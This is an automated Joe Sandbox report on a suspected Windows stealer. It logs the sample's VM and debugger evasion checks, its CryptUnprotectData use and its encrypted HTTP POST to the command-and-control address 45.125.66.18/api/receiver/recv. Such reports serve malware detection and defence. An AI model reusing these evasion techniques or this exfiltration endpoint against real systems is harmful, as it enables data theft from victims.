Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
V6ZsDcgx4N.exe

Overview

General Information

Sample name:V6ZsDcgx4N.exe
renamed because original name is a hash value
Original sample name:0a6bf0678bbd793e39a84dfb4c71d8b709d9e538288bf826c48b1ba899803ba4.exe
Analysis ID:1499688
MD5:2d4e723c184d9403b078e53f2de74a23
SHA1:92fa5f8f346cb987f249bd41755c5aedaf4c8646
SHA256:0a6bf0678bbd793e39a84dfb4c71d8b709d9e538288bf826c48b1ba899803ba4
Tags:exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • V6ZsDcgx4N.exe (PID: 2556 cmdline: "C:\Users\user\Desktop\V6ZsDcgx4N.exe" MD5: 2D4E723C184D9403B078E53F2DE74A23)
    • WerFault.exe (PID: 1412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 54484 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: V6ZsDcgx4N.exeAvira: detected
Source: V6ZsDcgx4N.exeReversingLabs: Detection: 15%
Source: V6ZsDcgx4N.exeVirustotal: Detection: 24%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: V6ZsDcgx4N.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00191000 CryptUnprotectData,0_2_00191000
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00191C40 CryptSignHashA,CryptUpdateProtectedState,WinHttpTimeFromSystemTime,0_2_00191C40
Source: V6ZsDcgx4N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: V6ZsDcgx4N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00198D40 FindFirstFileW,FindNextFileW,FindClose,0_2_00198D40
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Jump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: global trafficHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co3
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A61000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A2E000.00000004.00000001.00020000.00000000.sdmp, V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/api/receiver/recv
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/api/receiver/recv%
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A2E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18:443/api/receiver/recv
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00193D50 NtClose,NtClose,0_2_00193D50
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00191470 NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,GetFileType,CloseHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,0_2_00191470
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00191610 NtQueryObject,NtQueryObject,0_2_00191610
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 54484
Source: V6ZsDcgx4N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal76.evad.winEXE@2/5@0/1
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeMutant created: \Sessions\1\BaseNamedObjects\082e2202-17f7-4654-a651-ac9a3778e1d7
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2556
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\8169cccc-3fbd-4722-9720-2ab750781803Jump to behavior
Source: V6ZsDcgx4N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: V6ZsDcgx4N.exeReversingLabs: Detection: 15%
Source: V6ZsDcgx4N.exeVirustotal: Detection: 24%
Source: unknownProcess created: C:\Users\user\Desktop\V6ZsDcgx4N.exe "C:\Users\user\Desktop\V6ZsDcgx4N.exe"
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 54484
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSection loaded: wldp.dllJump to behavior
Source: V6ZsDcgx4N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: V6ZsDcgx4N.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_001917E0 GlobalHandle,LoadLibraryA,GetProcAddress,0_2_001917E0
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-2496
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-2585
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00198D40 FindFirstFileW,FindNextFileW,FindClose,0_2_00198D40
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00198CA0 GetSystemInfo,0_2_00198CA0
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Jump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeFile opened: C:\Users\user\AppData\Local\Adobe\Jump to behavior
Source: Amcache.hve.4.drBinary or memory string: VMware
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A2E000.00000004.00000001.00020000.00000000.sdmp, V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
Source: Amcache.hve.4.drBinary or memory string: vmci.sys
Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: VMware20,1
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeAPI call chain: ExitProcess graph end nodegraph_0-2512
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeAPI call chain: ExitProcess graph end nodegraph_0-2507
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_001917E0 GlobalHandle,LoadLibraryA,GetProcAddress,0_2_001917E0
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00191A20 mov eax, dword ptr fs:[00000030h]0_2_00191A20
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523257182.0000000000FB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523257182.0000000000FB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523257182.0000000000FB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523257182.0000000000FB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeCode function: 0_2_00198A80 cpuid 0_2_00198A80
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Native API
1
DLL Side-Loading
2
Process Injection
11
Virtualization/Sandbox Evasion
OS Credential Dumping1
Query Registry
Remote ServicesData from Local System11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
2
Process Injection
LSASS Memory121
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager11
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive12
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials14
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
V6ZsDcgx4N.exe16%ReversingLabs
V6ZsDcgx4N.exe24%VirustotalBrowse
V6ZsDcgx4N.exe100%AviraHEUR/AGEN.1315917
V6ZsDcgx4N.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
https://45.125.66.18/0%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv0%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv%0%Avira URL Cloudsafe
https://45.125.66.18:443/api/receiver/recv0%Avira URL Cloudsafe
http://microsoft.co30%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv3%VirustotalBrowse
https://45.125.66.18:443/api/receiver/recv3%VirustotalBrowse
https://45.125.66.18/2%VirustotalBrowse
No contacted domains info
NameMaliciousAntivirus DetectionReputation
https://45.125.66.18/api/receiver/recvfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://45.125.66.18/api/receiver/recv%V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://microsoft.co3V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://upx.sf.netAmcache.hve.4.drfalse
  • URL Reputation: safe
unknown
https://45.125.66.18/V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A61000.00000004.00000001.00020000.00000000.sdmpfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://45.125.66.18:443/api/receiver/recvV6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A2E000.00000004.00000001.00020000.00000000.sdmpfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
45.125.66.18
unknownHong Kong
133398TELE-ASTeleAsiaLimitedHKfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1499688
Start date and time:2024-08-27 12:46:58 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:V6ZsDcgx4N.exe
renamed because original name is a hash value
Original Sample Name:0a6bf0678bbd793e39a84dfb4c71d8b709d9e538288bf826c48b1ba899803ba4.exe
Detection:MAL
Classification:mal76.evad.winEXE@2/5@0/1
